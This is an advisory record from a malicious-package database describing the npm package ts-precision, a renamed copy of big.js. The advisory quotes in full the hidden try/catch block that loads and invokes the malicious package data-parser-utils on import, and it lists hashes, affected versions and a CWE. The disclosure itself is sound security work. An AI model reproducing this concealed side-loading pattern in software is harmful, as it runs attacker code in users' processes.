MAL-2026-6469

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-precision/MAL-2026-6469.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6469
Published
2026-06-25T18:11:56Z
Modified
2026-06-25T18:31:24.720246438Z
Summary
Malicious code in ts-precision (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c)

Package ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin M8ch88l@gmail.com' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: try { const doc = require("data-parser-utils"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. This block fires on every require('ts-precision') / import of the package, pulling in and invoking the known-malicious npm package data-parser-utils, with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "3.7.2"
            ],
            "sha256": "e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c",
            "import_time": "2026-06-25T18:17:38.177326218Z",
            "modified_time": "2026-06-25T18:11:56Z",
            "id": "IN-MAL-2026-007525",
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

npm / ts-precision

Package

Affected ranges

Affected versions

3.*
3.7.2

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "ts-precision-3.7.2.tgz",
            "hashes": {
                "sha1": "9ff147230bba976bc169b247c4d0d84ea8254261",
                "sha512_sri": "sha512-qeaZg4tesKgUjURYBWfdXHktdEgFeA70MWmdfo9Nixy9wnR+EknggmG17LFuXvpAgrpkjS0n7RAYNNozbjm/Ow=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "03c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
            "sha256": "4e4f951802cfc3b04a4e1d44353a360afce53a687163be32fa5360b43ea86674",
            "path": "big.js"
        },
        {
            "tlsh": "1d210463c9a19da70af85b94bcac03aaf1151b1f40a08c5bb07b130c5f3355b2095b7d",
            "sha256": "7b5b152905601ce985c7d4e8c912fd0e79655222935c785079b5aa1d8a5c4620",
            "path": "package.json"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-precision/MAL-2026-6469.json"